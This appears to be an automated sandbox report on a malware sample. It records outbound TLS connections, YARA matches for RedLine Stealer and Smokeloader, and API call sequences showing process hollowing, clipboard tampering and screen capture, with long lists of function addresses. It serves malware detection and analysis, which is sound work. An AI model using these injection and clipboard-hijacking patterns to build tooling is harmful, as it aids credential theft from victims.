Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768

Source: unknown	HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.7:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.7:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.7:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.7:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.7:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.7:49803 version: TLS 1.2

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

Code function: 2_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,

2_2_004016DF

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

2_2_004016DF

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

2_2_004016DF

Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe

Code function: 4_2_00436980 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,StretchBlt,ReleaseDC,DeleteObject,DeleteObject,

4_2_00436980

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000004.00000002.1712229018.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1382263686.00000000006F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe

Code function: 0_2_00670110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,

0_2_00670110

Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_004530C0	0_2_004530C0
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_0044FC89	0_2_0044FC89
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_004501CD	0_2_004501CD
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_00450E09	0_2_00450E09
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_00452A9B	0_2_00452A9B
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_00450711	0_2_00450711
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_00402F39	0_2_00402F39
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_0068703F	0_2_0068703F
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_006840B5	0_2_006840B5
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_00698186	0_2_00698186
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_0067F30A	0_2_0067F30A
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_0069F470	0_2_0069F470
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_0068943F	0_2_0068943F
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_00698430	0_2_00698430
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_006A764F	0_2_006A764F
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_006986F7	0_2_006986F7
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_0069F470	0_2_0069F470
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_0068489B	0_2_0068489B
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_006989B2	0_2_006989B2
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_0069DE7E	0_2_0069DE7E
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_00697E14	0_2_00697E14
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 0_2_00698EF0	0_2_00698EF0
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_00428012	2_2_00428012
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_004071A1	2_2_004071A1
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_004373C9	2_2_004373C9
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_00427474	2_2_00427474
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_0042D4DE	2_2_0042D4DE
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_00428550	2_2_00428550
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_0043D668	2_2_0043D668
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_0041669F	2_2_0041669F
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_00413715	2_2_00413715
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_004277E6	2_2_004277E6
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_0040E96A	2_2_0040E96A
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_0042EAD0	2_2_0042EAD0
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_00427A90	2_2_00427A90
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_00418A9F	2_2_00418A9F
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_00436CAF	2_2_00436CAF
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_00427D57	2_2_00427D57
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: 2_2_00413EFB	2_2_00413EFB
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0043B870	4_2_0043B870
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00408880	4_2_00408880
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0040CA62	4_2_0040CA62
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00421E70	4_2_00421E70
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00415720	4_2_00415720
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0040CFEC	4_2_0040CFEC
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00419840	4_2_00419840
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00406850	4_2_00406850
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00427860	4_2_00427860
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00427070	4_2_00427070
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00406000	4_2_00406000
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0043080E	4_2_0043080E
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0043F820	4_2_0043F820
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0041D0C0	4_2_0041D0C0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_004418A0	4_2_004418A0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0041194F	4_2_0041194F
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0043F150	4_2_0043F150
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0042B170	4_2_0042B170
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00403900	4_2_00403900
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00425100	4_2_00425100
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00439923	4_2_00439923
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00427133	4_2_00427133
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00433930	4_2_00433930
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_004121DB	4_2_004121DB
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0042A9F7	4_2_0042A9F7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0040E9B0	4_2_0040E9B0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0041825B	4_2_0041825B
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0042EA62	4_2_0042EA62
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00442A60	4_2_00442A60
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0041DAD0	4_2_0041DAD0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00429ADE	4_2_00429ADE
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00425AF0	4_2_00425AF0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_004092A0	4_2_004092A0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00405AB0	4_2_00405AB0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0040B2B0	4_2_0040B2B0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_004042B0	4_2_004042B0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0043CB40	4_2_0043CB40
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0042EB5F	4_2_0042EB5F
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00408360	4_2_00408360
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00428B67	4_2_00428B67
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00437B69	4_2_00437B69
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00402B20	4_2_00402B20
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00441B20	4_2_00441B20
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00432B24	4_2_00432B24
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_004063C0	4_2_004063C0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0042DBF0	4_2_0042DBF0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00422380	4_2_00422380
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0041BBA0	4_2_0041BBA0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0042BBA0	4_2_0042BBA0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0042EBA1	4_2_0042EBA1
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0042EBB3	4_2_0042EBB3
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00441BB0	4_2_00441BB0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00441C40	4_2_00441C40
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00442470	4_2_00442470
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00426C76	4_2_00426C76
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0041D400	4_2_0041D400
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0041C400	4_2_0041C400
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00417405	4_2_00417405
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00414C20	4_2_00414C20
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00432426	4_2_00432426
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00428437	4_2_00428437
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0043443D	4_2_0043443D
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_004354C4	4_2_004354C4
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00434CEF	4_2_00434CEF
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0043A4EF	4_2_0043A4EF
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_004374AB	4_2_004374AB
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0041DCB0	4_2_0041DCB0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0043ACB0	4_2_0043ACB0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0042FCBC	4_2_0042FCBC
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0040D545	4_2_0040D545
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00425D6A	4_2_00425D6A
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00435D13	4_2_00435D13
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00442D20	4_2_00442D20
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0043CD27	4_2_0043CD27
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00420D90	4_2_00420D90
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0043C5A0	4_2_0043C5A0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00436610	4_2_00436610
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00407620	4_2_00407620
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0040AE30	4_2_0040AE30
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0041F6D0	4_2_0041F6D0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00416ED0	4_2_00416ED0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0041BEE1	4_2_0041BEE1
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00402EF0	4_2_00402EF0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_004186FC	4_2_004186FC
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00423EFF	4_2_00423EFF
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00431E8E	4_2_00431E8E
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0041A690	4_2_0041A690
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0041AF24	4_2_0041AF24
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00427F30	4_2_00427F30
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0040DFE2	4_2_0040DFE2
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_004257E0	4_2_004257E0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00429FE4	4_2_00429FE4
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00409790	4_2_00409790
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_004427B0	4_2_004427B0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_00441FB0	4_2_00441FB0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020DE249	4_2_020DE249
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020DD253	4_2_020DD253
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020D6267	4_2_020D6267
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020FA305	4_2_020FA305
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020ED327	4_2_020ED327
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0210F3B7	4_2_0210F3B7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020F73B2	4_2_020F73B2
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_02112017	4_2_02112017
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020DB097	4_2_020DB097
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020F60B7	4_2_020F60B7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020F20D7	4_2_020F20D7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_021020F5	4_2_021020F5
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020EC148	4_2_020EC148
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020D3157	4_2_020D3157
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020F4166	4_2_020F4166
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020EB18B	4_2_020EB18B
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020F8197	4_2_020F8197
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020D6627	4_2_020D6627
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020ED667	4_2_020ED667
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020EC667	4_2_020EC667
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0210268D	4_2_0210268D
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_021046A4	4_2_021046A4
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_021126D7	4_2_021126D7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_02107712	4_2_02107712
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0210572B	4_2_0210572B
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0210A756	4_2_0210A756
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020DD7AC	4_2_020DD7AC
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020E2442	4_2_020E2442
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020E84C2	4_2_020E84C2
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020D9507	4_2_020D9507
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020D4517	4_2_020D4517
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020D85C7	4_2_020D85C7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020F25E7	4_2_020F25E7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_02112A17	4_2_02112A17
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_02100A75	4_2_02100A75
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0210FA87	4_2_0210FA87
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020E9AA7	4_2_020E9AA7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020D6AB7	4_2_020D6AB7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0210BAD7	4_2_0210BAD7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020D8AE7	4_2_020D8AE7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020E7AE4	4_2_020E7AE4
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020D3B67	4_2_020D3B67
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_02103B97	4_2_02103B97
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_02109B8A	4_2_02109B8A
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020E1BB6	4_2_020E1BB6
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0210C807	4_2_0210C807
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_02106877	4_2_02106877
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020D7887	4_2_020D7887
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020EA8F7	4_2_020EA8F7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020EF937	4_2_020EF937
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020D99F7	4_2_020D99F7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020FEE08	4_2_020FEE08
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020FBE07	4_2_020FBE07
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020FEE1A	4_2_020FEE1A
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020FDE57	4_2_020FDE57
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020E4E87	4_2_020E4E87
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0210AF17	4_2_0210AF17
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020EDF17	4_2_020EDF17
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020FFF23	4_2_020FFF23
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_02104F56	4_2_02104F56
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_02105F7A	4_2_02105F7A
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_02112F87	4_2_02112F87
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020E7FFA	4_2_020E7FFA
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020F0FF7	4_2_020F0FF7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020DEC17	4_2_020DEC17
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020DCCC9	4_2_020DCCC9
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020FECC9	4_2_020FECC9
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_02112CC7	4_2_02112CC7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020D5D17	4_2_020D5D17
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020EDD37	4_2_020EDD37
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020D2D87	4_2_020D2D87
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_02102D8B	4_2_02102D8B
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_0210CDA7	4_2_0210CDA7
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_02107DD0	4_2_02107DD0
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: 4_2_020FEDC6	4_2_020FEDC6

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe 25C2A9D961D4110C9E66519B777AA070BEEC2388278ADBD68454D537422BD895

Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: String function: 00414C10 appears 116 times
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: String function: 020E4E77 appears 116 times
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: String function: 020D83D7 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe	Code function: String function: 00408170 appears 45 times
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: String function: 00680748 appears 121 times
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: String function: 00410710 appears 53 times
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: String function: 006810B0 appears 53 times
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: String function: 0040FDA8 appears 125 times
Source: C:\Users\user\Desktop\fuk7RfLrD3.exe	Code function: String function: 0040F8F9 appears 36 times

Source: C:\Users\user\AppData\Local\Temp\D1F3.tmp.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7936 -s 1808

Source: fuk7RfLrD3.exe	Binary or memory string: OriginalFileName vs fuk7RfLrD3.exe
Source: fuk7RfLrD3.exe, 00000000.00000002.1381636417.0000000000670000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs fuk7RfLrD3.exe
Source: fuk7RfLrD3.exe	Binary or memory string: OriginalFileName vs fuk7RfLrD3.exe
Source: fuk7RfLrD3.exe, 00000002.00000003.1410218046.00000000031C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesOrehinal4 vs fuk7RfLrD3.exe
Source: fuk7RfLrD3.exe, 00000002.00000002.3827303048.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs fuk7RfLrD3.exe
Source: fuk7RfLrD3.exe, 00000002.00000002.3828207144.0000000003180000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesOrehinal4 vs fuk7RfLrD3.exe

Source: fuk7RfLrD3.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

